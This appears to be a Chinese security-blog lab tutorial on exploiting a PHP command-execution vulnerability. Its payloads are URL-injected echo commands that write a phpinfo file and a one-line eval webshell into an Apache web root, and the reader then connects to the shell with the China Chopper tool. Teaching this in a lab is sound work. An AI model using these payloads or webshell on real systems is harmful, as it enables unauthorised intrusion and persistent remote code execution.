文章总结： 本文演示了系统命令执行漏洞的利用过程，重点在于通过漏洞写入Webshell。实验环境为Win10操作机与Apache靶机，步骤包括利用URL拼接echo命令写入phpinfo测试文件及一句话木马，并使用中国菜刀工具成功连接。文章旨在让读者掌握命令执行漏洞的原理与利用方法，属于基础实战教程。 综合评分： 75 文章分类： WEB安全,渗透测试,实战经验

不会写shell？来看看这篇文章

原创

建哥聊安全 建哥聊安全

建哥聊安全

2026年3月10日 08:40 湖南

免责声明：严格禁止对任何未授权系统/网络进行扫描、攻击或入侵。 禁止制作/传播恶意程序，禁止参与任何网络犯罪。如擅自将本文实验技术用于非法用途，一切法律后果及责任由行为人独立承担，与作者无关。

创作不易，内容如对你有帮助，可以点个关注，转载时请务必注明原作者及原始出处链接，感谢配合。戳下面关注 ↓↓↓

系统命令执行漏洞利用之写shell

实验目的

通过本实验，掌握命令执行漏洞产生的原因和利用方法，体验命令执行漏洞的利用过程。

实验环境

·操作机：Win10 用户名：Administrator 密码：Sangfor!7890

·靶机：Apache + PHP

·实验地址：http://ip/os/system.php

实验原理

利用系统命令执行漏洞可以执行写文件的代码，生成新的脚本文件。

实验步骤

1、登录”Attack”操作机，打开浏览器，访问http://ip/os/system.php

2在URL后拼接：

?a=echo “<?php phpinfo();?>” > C:\server\apache22\htdocs\os\info.php，访问http://ip/os/system.php??a=echo“<?php phpinfo();?>”> C:\server\apache22\htdocs\os\info.php，执行代码

3.访问http://ip/os/info.php，新生成的info.php脚本文件成功解析执行

4.在URL后拼接：?a=echo “<?php @eval($_POST[666]);?>” > C:\server\apache22\htdocs\os\shell.php，访问http://ip/os/system.php?a=echo “<?php @eval($_POST[666]);?>” > C:\server\apache22\htdocs\os\shell.php，执行代码

5、访问http://ip/os/shell.php，无任何报错，shell.php一句话木马文件成功生成

6、打开桌面tools文件夹的“中国菜刀（过狗）”，双击exe文件

7.在空白处鼠标右击，点击“添加”，添加shell地址

·地址为：一句话木马地址和连接密码

·脚本类型：PHP

8.点击“添加”，双击一句话木马地址

实验总结

通过本实验，掌握系统命令执行漏洞的利用，执行生成代码的文件，从而生成新的脚本文件或者一句话木马文件。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：建哥聊安全 建哥聊安全 建哥聊安全《不会写shell？来看看这篇文章》